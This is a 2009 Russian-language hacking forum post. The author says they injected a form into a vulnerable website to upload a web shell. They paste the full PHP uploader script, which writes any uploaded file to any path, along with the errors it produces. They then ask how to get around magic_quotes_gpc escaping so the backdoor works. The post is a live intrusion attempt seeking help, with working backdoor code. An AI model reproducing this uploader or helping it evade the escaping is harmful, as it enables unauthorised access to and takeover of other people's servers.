17.03.2009, 23:27
|
|
Новичок
Регистрация: 30.12.2008
Сообщений: 3
С нами:
9137942
Репутация:
0
|
|
Возникли проблемы с magic_quotes
Загрузил на уязвимый сайт форму для загрузки шела, но вместо формы, вылетают ошибки вида:
Код:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 8
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /usr/local/www/blocks/block-form.php on line 8
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 8
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /usr/local/www/blocks/block-form.php on line 8
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 9
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /usr/local/www/blocks/block-form.php on line 9
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 9
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /usr/local/www/blocks/block-form.php on line 9
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 10
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /usr/local/www/blocks/block-form.php on line 10
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 10
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /usr/local/www/blocks/block-form.php on line 10
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /usr/local/www/blocks/block-form.php on line 11
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /usr/local/www/blocks/block-form.php on line 12
Сам скрипт формы:
PHP код:
<?php
if (!defined('BLOCK_FILE')) {
Header("Location: ../index.php");
exit;
}
$self = stripslashes($_SERVER['PHP_SELF']);
$docr = stripslashes($_SERVER['DOCUMENT_ROOT']);
$sern = stripslashes($_SERVER['SERVER_NAME']);
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = stripslashes($_GET['ac']);}
elseif (!empty($_POST['ac'])) {$ac = stripslashes($_POST['ac']);}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype=multipart/form-data action=$self method=POST>
<input type=hidden name=ac value=upload>
<tr>
<input size=5 name=file type=file></td>
</tr>
<tr>
<td><input size=10 value=$docr name=path type=text><input type=submit value=ОК></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = stripslashes($_POST['path'].$_FILES['file']['name']);
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Файл ".$_FILES['file']['name']." загружен";
} else {
print ("Не удаётся загрузить файл. Инф:\n");
print_r($_FILES);
}
}
break;
}
?>
На сервере установлено расширение magic_quotes_gpc.
Интересующий вопрос: Как обойти принудительное экранирование кавычек и апострофов в скрипте? |
|
|